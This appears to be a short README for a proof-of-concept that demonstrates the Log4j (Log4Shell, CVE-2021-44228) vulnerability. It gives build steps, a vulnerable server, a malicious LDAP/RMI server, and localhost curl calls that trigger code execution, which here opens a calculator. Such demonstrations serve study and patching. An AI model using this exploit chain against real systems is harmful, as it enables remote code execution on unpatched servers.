demo projects to highlight how to execute the log4j (CVE-2021-44228) vulnerability
used spring boot just to be quickly set up. you'll have to excuse all the hard coding, it was just a POC.
Have Java 8 installed. Build using maven mvn clean package -DskipTests. Run these commands in separate shell windows:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMIThis should execute the code in the Exploit class (which will just open up the calculator)